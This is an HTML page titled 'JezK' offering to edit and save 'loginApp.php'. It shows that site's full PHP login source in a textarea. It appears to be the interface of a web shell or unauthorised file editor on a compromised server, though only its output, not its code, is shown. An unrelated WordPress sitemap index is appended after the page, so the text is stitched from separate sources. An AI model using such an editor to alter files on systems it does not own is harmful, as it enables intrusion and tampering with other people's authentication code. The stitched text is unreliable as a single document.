
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: loginApp.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php

ini_set('session.cookie_secure', '1');         // Only over HTTPS
ini_set('session.cookie_httponly', '1');       // JS can't access cookie
ini_set('session.cookie_samesite', 'Strict'); 

// Security Headers
header(&quot;X-XSS-Protection: 1; mode=block&quot;);

session_start();
include(&quot;main.php&quot;);
$email = $_POST[&quot;email&quot;];
$password = $_POST[&quot;password&quot;];
$captcha = $_POST['g-recaptcha-response'];

$verifyStatus = $bdc-&gt;verify_recaptcha($captcha);

if (!$verifyStatus) {
	$_SESSION['loginFailed'] = 1; // custom message
	echo &quot;&lt;script&gt;alert('Captcha verification failed. Please try again.');location.replace('../index.php');&lt;/script&gt;&quot;;
	exit;
}

// RATE LIMIT CHECK
$ip = $_SERVER['HTTP_CF_CONNECTING_IP'];
$attempts = $bdc-&gt;loginAttempt($ip);
if ($attempts &gt;= 5) {
	http_response_code(429); // Too many requests
	$_SESSION['loginFailed'] = 1; // custom message
	echo &quot;&lt;script&gt;alert('Too many login attempts. Try again after 10 minutes.');location.replace('../index.php');&lt;/script&gt;&quot;;
	exit;
}


// Validate Email
if (!filter_var($email, FILTER_VALIDATE_EMAIL)) {
	http_response_code(400);
    echo &quot;&lt;script&gt;location.replace('../index.php');&lt;/script&gt;&quot;;
    exit;
}


// $passRegex = &quot;/^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)(?=.*[\W_]).{12,}$/&quot;;

// if (!preg_match($passRegex, $password)) {
// 	http_response_code(400);
//    $_SESSION['loginFailed'] = 1;
// 	echo &quot;&lt;script&gt;location.replace('../index.php');&lt;/script&gt;&quot;;
// }

$result = $bdc-&gt;login($email,$password);
if($result == 0)
{

// Insert failed attempt
	$bdc-&gt;insertLoginAttempt($ip);

	http_response_code(400);
	$_SESSION['loginFailed'] = 1;
	echo &quot;&lt;script&gt;location.replace('../index.php');&lt;/script&gt;&quot;;
}
else if($result == -1)
{
	http_response_code(400);
	$_SESSION['userDeactivated'] = 1;
	echo &quot;&lt;script&gt;location.replace('../index.php');&lt;/script&gt;&quot;;
}
else
{

// Clear attempts on successful login
	$bdc-&gt;clearLoginAttempts($ip);

    session_regenerate_id(true);

	$_SESSION['bdcUserID'] = $result['id'];
	$_SESSION['bdcCode'] = $result['code'];
	$_SESSION['bdcName'] = $result['name'];
	$_SESSION['bdcUserPassword'] = $result['password'];

    $_SESSION['USER_IP'] = $_SERVER['HTTP_CF_CONNECTING_IP'];
	$_SESSION['USER_AGENT'] = $_SERVER['HTTP_USER_AGENT'];

    $session_token = bin2hex(random_bytes(32)); // Generate secure session token
	$_SESSION['session_token'] = $session_token;

	$updateStatus = $bdc-&gt;updateSession($session_token, $result['id']);


	echo &quot;&lt;script&gt;location.replace('../dashboard.php');&lt;/script&gt;&quot;;
}
?&gt;
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://satyadevaresidency.com/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://satyadevaresidency.com/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://satyadevaresidency.com/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://satyadevaresidency.com/wp-sitemap-posts-gallery-1.xml</loc></sitemap><sitemap><loc>https://satyadevaresidency.com/wp-sitemap-posts-testimonial-1.xml</loc></sitemap><sitemap><loc>https://satyadevaresidency.com/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://satyadevaresidency.com/wp-sitemap-taxonomies-post_tag-1.xml</loc></sitemap><sitemap><loc>https://satyadevaresidency.com/wp-sitemap-taxonomies-gallery_cat-1.xml</loc></sitemap></sitemapindex>
